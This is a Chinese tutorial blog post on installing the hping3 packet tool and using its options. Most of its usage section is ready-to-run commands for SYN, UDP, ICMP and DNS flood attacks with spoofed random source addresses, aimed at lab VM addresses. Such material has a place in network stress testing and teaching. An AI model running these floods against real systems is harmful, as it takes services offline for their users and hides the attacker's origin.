hping3安装使用

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bEm4ipDE-1658473654885)(…–flood指定发包速率,尽可能按最快速度发,不用回应。192.168.46.4安装了nginx服务。–faster指定发包速率,每秒100个。-0原始ip模式,即RAWSOCKET。-d指定data数据大小,默认为0。-s使用指定的源端口,默认是随机的。-t指定ttl值,

不会打字314

2337人浏览 · 2022-07-22 15:08:07

不会打字314 · 2022-07-22 15:08:07

hping3安装使用

安装

安装依赖库

先安装以下依赖库：

yum -y install libpcap
yum -y install libpcap-devel
yum -y install tcl-devel

方式一: yum 安装

yum -y install hping3

方式二：源码安装 (安装报错)

# 下载
wget http://www.hping.org/hping3-20051105.tar.gz

# 解压
tar xvf hping3-20051105.tar.gz
cd hping3-20051105

# 配置
./configure

# 编译
make 

# 安装
make install

测试环境

两台虚拟机

192.168.46.3

192.168.46.4

说明

192.168.46.4 安装了 nginx 服务

参数说明

详细说明

https://blog.csdn.net/baidu_19348579/article/details/109443122?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165811271716782184635478%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=165811271716782184635478&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2_alltop_positive~default-1-109443122-null-null.142^v32pc_rank_34,185^v2tag_show&utm_term=hping3&spm=1018.2226.3001.4187

简单说明

全局选项

-I 指定所使用的网卡接口

-c 指定发包个数

–fast 指定发包速率,每秒10个

–faster 指定发包速率,每秒100个

–flood 指定发包速率,尽可能按最快速度发,不用回应

-E 从指定的文件中读取数据

-e 增加签名,相当于连接’密码’

-B 启用安全协议

-T 启用路由跟踪模式

-d 指定data数据大小,默认为0

-V 显示发包的详细过程

指定发包模式 [默认走的tcp模式]:

-0 原始ip模式,即RAWSOCKET

-1 icmp模式

-2 udp模式

-8 扫描模式

-9 被动监听模式,可用于正向shell连接

ip配置选项:

-a 伪造源ip

–rand-dest 使用随机目的地址

–rand-source 使用随机源地址

-t 指定ttl值,默认为64

-f 使用分片发送

icmp配置选项:

-C 指定icmp类型

udp/tcp配置选项:

-s 使用指定的源端口,默认是随机的

-p 指定目的端口

-w 指定数据包大小,默认为64

-F 使用FIN标志

-S 使用SYN标志

-R 使用RST标志

-A 使用ACK标志

-U 使用RUG标志

-P 使用PUSH标志

使用

端口扫描

# 通过 eth0 网口，发送 SYN 报文 到 192.168.1.1:80
hping3 -I eth0 -S 192.168.46.4 -p 80

syn flood

默认协议： tcp
默认源端口：随机
默认源地址：攻击机的 ip 地址

# 通过 eth0 网口。发送 SYN 报文 到 192.168.46.4:80。伪造源地址为192.168.1.222，时间间隔 1000us。
hping3 -I eth0 -S 192.168.46.4 -p 80 -a 192.168.1.222 -i u1000

# 通过 eth0 网口。发送 SYN 报文 到 192.168.46.4:80。伪造随机源地址，时间间隔 1000us。
hping3 -I eth0 -S 192.168.46.4 -p 80 --rand-source -i u1000

# 通过 eth0 网口。发送 SYN 报文 到 192.168.46.4:80。伪造随机源地址，洪水攻击。
# 洪水攻击，速率最快的攻击。不会显示数据 和 丢包的统计。
hping3 -I eth0 -S 192.168.1.168 -p 9000 --rand-source --flood

hping3  -S 192.168.1.168 -p 9000 --rand-source --flood

udp flood

# 发送 udp 报文 到 192.168.46.4:80。
hping3 --udp 192.168.46.4 -p 80

# 发送 udp 报文 到 192.168.46.4:80。伪造随机源地址，洪水攻击。
hping3 --udp 192.168.1.168 -p 8000 --rand-source --flood

icmp flood

# 发送 icmp 报文 到 192.168.46.4。
hping3 --icmp 192.168.46.4

# 发送 icmp 报文 到 192.168.46.4。伪造随机源地址，洪水攻击。
hping3 --icmp 192.168.1.168 --rand-source --flood

dns flood

# 发送 udp 报文 到 192.168.1.1:53。伪造随机源地址，洪水攻击。
hping3 --udp 192.168.1.168  --rand-source --flood

其余参考

https://blog.csdn.net/yk_wing4/article/details/102459068?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165811271716780366569539%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=165811271716780366569539&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2_allfirst_rank_ecpm_v1~pc_rank_34-24-102459068-null-null.142^v32pc_rank_34,185^v2tag_show&utm_term=hping3&spm=1018.2226.3001.4187

例如

hping3 -c 12000 -d 13000 -S -w 640 -p 9000 --flood --rand-source 192.168.1.168

华为云开发者联盟

为开发者提供学习成长、分享交流、生态实践、资源工具等服务，帮助开发者快速成长。

更多推荐

又双叒叕种草了新家装风格？AI帮你家居换装

华为云开发者联盟

执行计划缓存，Prepared Statement性能跃升的秘密

华为云开发者联盟

预约直播|揭秘鸿蒙全新流量阵地，元服务带来的体验变革

传统厚重的App，功能齐全，但开发成本高、周期长，且存在搜索、安装、卸载等一系列需要用户主动关注的显性操作，这些显性操作给用户带来了实质性的使用成本。”特点的元服务，是鸿蒙系统的一种全新的轻量化应用形态，可通过华为应用市场、负一屏、搜索等终端的多样化系统级智慧入口进行分发，用户无需安装，通过点击卡片、碰一碰、扫一扫等方式即可直接触发，享受 “即用即走”的流畅、丝滑体验。，现身说法，介绍小强停车在鸿